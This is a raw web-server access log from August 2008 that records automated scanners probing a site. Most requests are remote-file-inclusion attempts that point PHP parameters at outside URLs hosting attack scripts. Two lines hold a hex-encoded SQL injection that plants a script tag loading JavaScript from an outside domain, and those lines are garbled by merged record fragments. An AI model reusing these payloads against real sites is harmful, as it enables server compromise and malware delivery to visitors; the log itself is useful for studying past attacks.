67.18.29.218 - - [31/Aug/2008:10:28:55 -0700] "GET /logs/access_080411.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:28:55 -0700] "GET /index.php?do=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 200 89506 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:28:55 -0700] "GET /index.php?do=http://cell-depot.com/hack-id.txt? HTTP/1.1" 200 89417 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:28:56 -0700] "GET /logs/index.php?do=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:28:56 -0700] "GET /logs/index.php?do=http://cell-depot.com/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:10:29:03 -0700] "GET /bikes/WeSTOC08/?D=A HTTP/1.0" 200 832 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:10:29:05 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:29:07 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:29:09 -0700] "GET //index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89576 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:29:10 -0700] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:29:10 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:29:11 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:29:11 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.97.35 - - [31/Aug/2008:10:29:11 -0700] "GET /logs/access_080528.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:29:14 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:29:14 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:29:14 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:29:27 -0700] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:29:27 -0700] "GET /xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:10:29:27 -0700] "GET /logs/access_080717.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:29:27 -0700] "GET /logs/xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.234.182.28 - - [31/Aug/2008:10:29:29 -0700] "GET /logs/access_080411.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077686572652027sdpanek/us1:71.193.87.4967.205.111.117 - - [31/Aug/2008:10:29:37 -0700] "GET /logs/access_080507.log/index.php?x=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:29:38 -0700] "GET /index.php?x=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 200 89517 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:29:38 -0700] "GET /logs/index.php?x=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:29:42 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:29:43 -0700] "GET //index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89592 "-" "libwww-perl/5.805" "www.dmulk.com"
74.234.182.28 - - [31/Aug/2008:10:29:43 -0700] "GET /logs/access_080411.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272lingeriestoreusa/us2:64.67.18.29.218 - - [31/Aug/2008:10:29:44 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:29:46 -0700] "GET /logs/access_080507.log/index.php?x=http://cell-depot.com/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:29:47 -0700] "GET /index.php?x=http://cell-depot.com/hack-id.txt? HTTP/1.1" 200 89396 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:29:47 -0700] "GET /logs/index.php?x=http://cell-depot.com/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:29:49 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:10:29:53 -0700] "GET /logs/access_080224.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:30:11 -0700] "GET /logs/access_080718.log/index.php?x=http://septimamaipu.cl/septima/mambots/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:14 -0700] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:14 -0700] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:14 -0700] "GET /xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:14 -0700] "GET /xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:14 -0700] "GET /logs/xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:14 -0700] "GET /logs/xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:30:15 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:30:15 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:30:20 -0700] "GET /logs/access_080718.log/index.php?x=http://cell-depot.com/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:10:30:28 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:29 -0700] "GET /logs/access_080511.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:29 -0700] "GET /senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [31/Aug/2008:10:30:29 -0700] "GET /logs/access_080528.log/common/func.php?CommonAbsDir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:29 -0700] "GET /logs/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:10:30:30 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:30 -0700] "GET /logs/access_080511.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [31/Aug/2008:10:30:30 -0700] "GET /common/func.php?CommonAbsDir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:31 -0700] "GET /senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:30:31 -0700] "GET /logs/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [31/Aug/2008:10:30:32 -0700] "GET /logs/common/func.php?CommonAbsDir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.31 - - [31/Aug/2008:10:30:33 -0700] "GET /minamijewelry/dream.psd HTTP/1.1" 200 109304 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:30:35 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:30:36 -0700] "GET /convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:30:36 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:30:38 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:30:56 -0700] "GET /logs/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:30:59 -0700] "GET /?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89466 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.64 - - [31/Aug/2008:10:31:06 -0700] "GET /logs/access_080302.log/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:10:31:08 -0700] "GET /logs/access_080313.log//?custompluginfile[]=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.64 - - [31/Aug/2008:10:31:08 -0700] "GET /index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 89646 "-" "libwww-perl/5.805" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:10:31:09 -0700] "GET /logs/access_080313.log//?custompluginfile[]=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.64 - - [31/Aug/2008:10:31:10 -0700] "GET /logs/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:10:31:18 -0700] "GET /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 200 90067 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:10:31:19 -0700] "GET /logs/access_080117.log/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:10:31:20 -0700] "GET /logs/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 200 63000 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:31:21 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.192.98 - - [31/Aug/2008:10:31:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "dmulk.com"
66.98.192.98 - - [31/Aug/2008:10:31:25 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:31:26 -0700] "GET /logs/access_080706.log/convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:10:31:46 -0700] "GET /logs/access_080218.log/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.129.138.76 - - [31/Aug/2008:10:31:49 -0700] "GET /logs/access_080727.log/index.php?do=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.138.76 - - [31/Aug/2008:10:31:51 -0700] "GET /index.php?do=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 200 89482 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.138.76 - - [31/Aug/2008:10:31:52 -0700] "GET /logs/index.php?do=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:31:54 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:31:54 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.20.53.210 - - [31/Aug/2008:10:32:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
64.20.53.210 - - [31/Aug/2008:10:32:21 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:32:21 -0700] "GET /logs/access_080409.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:32:23 -0700] "GET /logs/access_080409.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:10:32:30 -0700] "GET /logs/access_080806.log//e404.php?DOCUMENT_ROOT=http://locoputo.supergranny.ws/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:10:32:30 -0700] "GET //e404.php?DOCUMENT_ROOT=http://locoputo.supergranny.ws/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:10:32:30 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://locoputo.supergranny.ws/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:10:32:32 -0700] "GET /logs/access_080806.log//e404.php?DOCUMENT_ROOT=http://locoputo.supergranny.ws/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:10:32:32 -0700] "GET //e404.php?DOCUMENT_ROOT=http://locoputo.supergranny.ws/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:10:32:32 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://locoputo.supergranny.ws/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:33:04 -0700] "GET /logs/access_080809.log/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:33:04 -0700] "GET /errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:33:05 -0700] "GET /logs/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.64 - - [31/Aug/2008:10:33:05 -0700] "GET /logs/access_080224.log/index.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:33:07 -0700] "GET /logs/access_080315.log/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:33:11 -0700] "GET /logs/access_080809.log/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:33:11 -0700] "GET /errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:33:11 -0700] "GET /logs/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:33:23 -0700] "GET /logs/access_080315.log/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:33:30 -0700] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:33:30 -0700] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:33:30 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:33:30 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:33:31 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:33:31 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:33:33 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:33:33 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:10:33:35 -0700] "GET /logs/access_080707.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:33:43 -0700] "GET /logs/access_080809.log/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:33:43 -0700] "GET /errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:33:44 -0700] "GET /logs/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:10:33:49 -0700] "GET /logs/access_080522.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:33:56 -0700] "GET /logs/access_080315.log/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:10:34:08 -0700] "GET /logs/access_080522.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:10:34:08 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:34:10 -0700] "GET /logs/access_080511.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:34:11 -0700] "GET /senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:34:11 -0700] "GET /logs/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:34:18 -0700] "GET /logs/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:34:18 -0700] "GET /senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:34:18 -0700] "GET /logs/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
